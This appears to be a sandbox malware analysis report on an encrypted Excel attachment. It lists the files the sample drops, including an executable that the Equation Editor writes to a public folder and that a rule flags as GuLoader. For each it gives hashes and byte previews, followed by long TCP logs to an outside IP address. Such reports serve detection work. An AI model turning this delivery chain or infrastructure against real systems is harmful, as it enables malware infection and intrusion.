Preview:	.PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.\|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7A07AD.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\Desktop\~$MTIR21487610_0062180102_20210714081247.PDF.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	267376
Entropy (8bit):	4.7769054763067915
Encrypted:	false
SSDEEP:	1536:x2M5j2eBXFScbssSe/W+dMa27qQ0Z9Dfs4IwNAvgiIOm72tNHLg/8A:T5FXrbVTeE2uQU7s49AMUrg/8A
MD5:	FCFB0EC70F1419EDE8A534CC95CB61E9
SHA1:	D3B529D77F1DE00D63A75B3956D4BCF6BBCE30CA
SHA-256:	FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
SHA-512:	FFEC36B157F889A2BD351B9D8423B247138A5FD2E57DE83BB1253336518431136A265D244B653AF470A8D04E2674C4CADF467C065A7FC38F10EFFEDD705AB248
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
Antivirus:	Antivirus: Virustotal, Detection: 42%, Browse Antivirus: Metadefender, Detection: 14%, Browse Antivirus: ReversingLabs, Detection: 31%
Joe Sandbox View:	Filename: Booking Confirmation.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....FR.................`..........p........p....@..........................................................................d..(........z..........X............... .......................................(... ....................................text...0Y.......`.................. ..`.data........p.......p..............@....rsrc....z..........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.994138372411622
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	MTIR21487610_0062180102_20210714081247.PDF.xlsx
File size:	1268792
MD5:	168c2cabea51b16aa19a152a652254f5
SHA1:	477715c6a9d3219ea85a60eac9c80af83a102357
SHA256:	9b88ac825c56b50955cbc6211bb563f7334c51c2e90e3d2bfebefed817b4ad90
SHA512:	fe86fb777b4f1985fe62a65a55474f3509cc512d348a09dd52e5573b158c3948fefef073e1a451624c5f000a94f673334ce6e33ae0a5f5254a4b3913353da7c1
SSDEEP:	24576:umfPHCGbjiYxz58oRX1HjpN4V0g9LxJMmKu5QL6HiIFjQrcFE://Hi4z5DVj0OgWu5Q2CIFjKcFE
File Content Preview:	........................>...............................................................................................~.......z.......{.......z.......z......................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "MTIR21487610_0062180102_20210714081247.PDF.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	208
Entropy:	3.35153409046
Base64 Encoded:	False
Data ASCII:	l . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . A E S 1 2 8 . . . . . . . . . . . . .
Data Raw:	6c 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1254968

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	1254968
Entropy:	7.99875082678
Base64 Encoded:	True
Data ASCII:	' & . . . . . . . . . . . g . . Z . . . . . . D . . . D n . ? w . . . K . F . . / . # . . & . . . ? . . . . / . . . . . . . j . q . q & . Z . b . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b . . . X R Y . . t . ; . . j k b .
Data Raw:	27 26 13 00 00 00 00 00 b4 f8 fd f3 03 67 b7 e8 5a a8 8f 06 bd 1e c7 44 f8 02 97 44 6e e5 3f 77 bc ec f7 4b e9 46 c9 1e 2f 1b 23 c2 0b 26 b3 1e b2 3f de fd d4 0d 2f f5 b1 c7 ff df ca aa 6a 19 71 f6 71 26 bf 5a bf 62 1b 3b 0b 02 6a 6b 62 e2 e5 d5 58 52 59 8b 94 74 1b 3b 0b 02 6a 6b 62 e2 e5 d5 58 52 59 8b 94 74 1b 3b 0b 02 6a 6b 62 e2 e5 d5 58 52 59 8b 94 74 1b 3b 0b 02 6a 6b 62 e2

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.61267256672
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . Y . u . . . . j r r . . n . ^ \\ . . . . . . . . . V . . . . w . . . . h S o . . . . . . . . . . . . G o . . . . . % . b P . . . . . .
Data Raw:	03 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 20 1a c9 02 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 15, 2021 11:06:44.594949961 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:44.849909067 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:44.850059986 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:44.850883961 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.107646942 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.107681990 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.107701063 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.107719898 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.107873917 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.362483978 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.362519979 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.362535000 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.362550020 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.362567902 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.362636089 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.362639904 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.362663031 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.362669945 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.362704039 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.362720013 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.362741947 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.362747908 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.618730068 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.618763924 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.618777037 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.618792057 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.618803024 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.618815899 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.618830919 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.618844032 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.618860006 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.618886948 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.618891954 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.618922949 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.618927002 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.618972063 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.618987083 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.619029999 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.619050026 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.619062901 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.619077921 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.619091988 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.619111061 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.619122028 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.619189024 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.620773077 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.873116970 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873153925 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873182058 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873194933 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873210907 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873229980 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873383045 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.873482943 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873498917 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873513937 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873579979 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.873600006 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.873605013 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.873615980 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873656034 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873687029 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.873863935 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873891115 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873907089 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873923063 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873909950 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.873936892 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873955965 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873959064 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.873987913 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.873989105 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874003887 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.874034882 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874041080 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874043941 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874059916 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874063015 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874064922 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.874066114 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874109030 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874181986 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.874197960 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.874212980 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.874228954 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.874248028 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874257088 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874260902 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874264002 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874289036 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.874304056 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.874317884 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.874351978 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874361038 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874363899 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874454975 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.874471903 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.874486923 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.874499083 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:45.874521017 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874533892 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874540091 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:45.874897957 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.127983093 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128053904 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128089905 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128113031 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128129959 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128134966 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128155947 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128164053 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128169060 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128176928 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128181934 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128190994 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128206968 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128216028 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128228903 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128241062 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128251076 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128273010 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128287077 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128427982 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128452063 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128464937 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128474951 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128498077 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128518105 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128530025 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128563881 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128626108 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128648043 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128680944 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128685951 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128719091 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128741980 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128762960 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128776073 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128778934 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128812075 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128844976 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128909111 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128922939 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128931046 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128952026 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128957033 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128973961 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128973961 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.128985882 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.128995895 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129018068 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129021883 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129041910 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129043102 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129064083 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129077911 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129100084 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129100084 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129117966 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129122019 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129134893 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129143000 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129152060 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129165888 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129174948 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129190922 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129223108 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129244089 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129261971 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129278898 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129278898 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129298925 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129317999 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129323006 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129336119 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129338980 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129350901 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129363060 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129365921 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129384041 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129395008 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129404068 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 15, 2021 11:06:46.129411936 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 15, 2021 11:06:46.129426003 CEST	80	49165	180.214.239.39	192.168.2.22
